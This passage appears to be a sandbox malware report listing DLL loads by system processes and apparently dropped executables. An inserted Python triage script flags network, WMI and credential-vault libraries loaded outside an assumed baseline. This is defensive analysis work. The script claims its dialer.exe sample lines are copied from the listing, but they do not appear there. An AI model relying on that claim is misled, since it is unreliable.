Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Users\user\AppData\Roaming\gfiecjd Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\F324.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\F324.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
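The module-load listing above is raw evidence; what an analyst wants from it is a per-process module profile and a short list of host processes loading libraries outside their normal role (the 32-bit dialer.exe pulling in the WMI client, Winsock and amsi.dll; explorer.exe pulling in WinHTTP, DNS, the Windows Filtering Platform client and the credential vault client). The following Python is an added triage example, not part of the report or of the sandbox that produced it. The DLL-to-capability groupings and the per-image baseline are assumptions chosen for illustration and are deliberately tight, so the output is a triage list rather than a verdict; the sample lines are copied from the listing above in the report's own format, some still carrying the page's link text, which the parser tolerates.

```python
"""Triage helper for 'Section loaded' evidence from a sandbox report.

Parses lines in the report's 'Source: <image path> Section loaded: <dll>'
format, builds an ordered, de-duplicated module list per process, and flags
host processes that load capability libraries (network stack, WMI client,
credential store, task scheduler, AMSI) outside a small expected baseline.
The groupings and the baseline are working assumptions for this example.
"""
import re
from collections import OrderedDict

# Constructed sample: lines copied from the report's listing in its own format
# (some still carry the page's 'Jump to behavior' link text).
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
"""

# One report line. The image path is matched non-greedily so a dropped file
# without an extension (e.g. ...\AppData\Roaming\gfiecjd) still parses, and
# anything after the DLL name (link text) is ignored.
LINE_RE = re.compile(r"^Source:\s+(?P<proc>.+?)\s+Section loaded:\s+(?P<dll>\S+)")

# Assumption: which loaded library implies which capability.
CAPABILITY_DLLS = OrderedDict([
    ("network", {"winhttp.dll", "wininet.dll", "dnsapi.dll", "mswsock.dll",
                 "fwpuclnt.dll", "webio.dll"}),
    ("wmi", {"wbemcomn.dll", "fastprox.dll", "wmitomi.dll", "mi.dll"}),
    ("credential_store", {"vaultcli.dll", "dpapi.dll"}),
    ("task_scheduler", {"taskschd.dll"}),
    # amsi.dll is pulled in by script hosts and the CLR; a plain native image
    # loading it is worth a look.
    ("amsi", {"amsi.dll"}),
])

# Assumption: a deliberately tight baseline of capabilities that are normal for
# an image name. Images not listed are expected to need none of them.
EXPECTED_CAPABILITIES = {
    "powershell.exe": {"network", "wmi", "credential_store", "amsi"},
    "wmiprvse.exe": {"wmi", "network"},
    "schtasks.exe": {"task_scheduler"},
    "explorer.exe": {"task_scheduler"},
}


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_section_loads(text):
    """Return {image_path: [dll, ...]} keeping first-load order, dropping repeats."""
    loads = OrderedDict()
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank line or not a 'Section loaded' record
        dll = m.group("dll").lower()
        seen = loads.setdefault(m.group("proc"), [])
        if dll not in seen:
            seen.append(dll)
    return loads


def flag_unexpected_capabilities(loads):
    """Return [(image, capability, [dlls])] for capability loads outside the baseline."""
    findings = []
    for proc, dlls in loads.items():
        image = image_name(proc)
        allowed = EXPECTED_CAPABILITIES.get(image, set())
        for capability, markers in CAPABILITY_DLLS.items():
            hits = [d for d in dlls if d in markers]
            if hits and capability not in allowed:
                findings.append((image, capability, hits))
    return findings


if __name__ == "__main__":
    for image, capability, hits in flag_unexpected_capabilities(
            parse_section_loads(SAMPLE_LINES)):
        print(f"{image}: unexpected {capability} capability via {', '.join(hits)}")
```

Run against the sample, the script reports dialer.exe for network, wmi and amsi, and both explorer.exe images for network (plus credential_store for the SysWOW64 copy), while powershell.exe and schtasks.exe stay quiet because their loads fall inside the baseline. Feed it the whole report by pasting the listing into SAMPLE_LINES or reading it from a file; the same parse handles every process block on the page.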
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
